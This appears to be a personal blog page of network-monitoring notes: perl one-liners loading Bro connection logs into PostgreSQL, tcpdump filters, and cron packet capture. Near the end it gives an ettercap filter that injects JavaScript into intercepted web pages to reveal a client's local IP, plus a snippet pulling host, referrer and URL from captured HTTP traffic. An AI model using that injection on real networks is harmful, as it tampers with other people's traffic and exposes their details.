Tadek’s Blog

1. Create a database table with the following fields:
   • sip address
   • sport
   • dip address
   • dport -sbytes -rbytes -conn length

create table conn(sip inet, sport int, dip inet, dport int, rbytes int, sbytes int, length float);

1. Use perl one liner: perl -ne ‘ @a = split; print “INSERT INTO conn VALUES(‘”‘”‘$a[2]‘”‘”‘, $a[5], ‘”‘”‘$a[3]‘”‘”‘, $a[6], $a[8], $a[9],$a[1]);\n”;’

BTW need also to replace ? with NULLs — do it with =~ s/// command.

1. Combine all of them into a horrible thing: cat conn.log | perl -ne ‘@a = split; $a[8] =~ s/\?/NULL/; $a[9] =~ s/\?/NULL/; $a[1] =~ s/\?/NULL/; print “INSERT INTO conn VALUES(‘”‘”‘$a[2]‘”‘”‘, $a[5], ‘”‘”‘$a[3]‘”‘”‘, $a[6], $a[8], $a[9], $a[1]);\n”;’ | psql test test -h 127.0.0.1

Diego’s “shell nasty quoting tricks”: print ” ‘ ” ‘ ” ‘ ” ‘

or in more details: perl -e ‘print ” a’ ” ‘ ” ‘b ” ‘

Yes they are – “ are better replaced with $(). The problem is that not all the shells know about it

Task: match all outgoing traffic (not including local services, e.g. 80, 22, 25). Actually, not as simple as it could have been. Moreover, contrary to a manpage, my tcpdump does not seem to support “portrange”. Hopefully, can do something like this: tcp[0:2] for source port and tcp[2:2] for destination port.

At the end the rule is as follows: tcpdump -n -i eth0 “(udp and ( ((dst host $MYIP) and (udp[2:2] >= 1024)) or ((src host $MYIP)and(udp[0:2] >= 1024)) )) or (tcp and ( ((dst host $MYIP) and (tcp[2:2] >= 1024)) or ((src host $MYIP)and(tcp[0:2] >= 1024)) ) and (not port (9030||9001)))”

To overcome this limit one needs to recompile: 1. libpcap 2. snort/bro/… itself.

Hope it works – haven’t tried it yet.

http://www.tcpdump.org/lists/workers/2003/11/msg00047.html http://archives.neohapsis.com/archives/snort/2002-02/0395.html

Add this line to cron.daily/cron.hourly/…

tcpdump -np -i eth0 -s 0 -w /<path>/date +"%Y%m%d-%H%M%S.tcpdump" “<filter>”

This should inject a javascript getting your local IP address:

replace(“^</BODY>”,”<script>s1 = \”error\”;s2 = \”error\”;try { so = new java.net.Socket(); so.bind(new java.net.InetSocketAddress(\”0.0.0.0\”,0)); so.connect(new java.net.InetSocketAddress(document.domain,80)); s1 = so.getLocalAddress().getHostAddress(); s2 = so.getLocalAddress().getHostName(); so.close(); } catch (e) { document.writeln(e); } alert(\”Client’s IP: \”+ s1 + \”(\”+s2+\”)\”); </script></BODY>”);

Yon need to compile this filter with etterfiler and run it with “ettercap -F <filter.ef>

Haven’t tried it but it should work.

Extracting tripples (host, referrer, GET) from HTTP connection packets (prints stuff on “.”).

perl -ne ‘$get = $1 if /^GET ([^\s]) /; $host = $1 if /^Host: ([^\s])/; $ref=$1 if /^Referer: ([^\s]*)/; if (/^.$/) { print “ID, $host, $get, $ref\n”;}’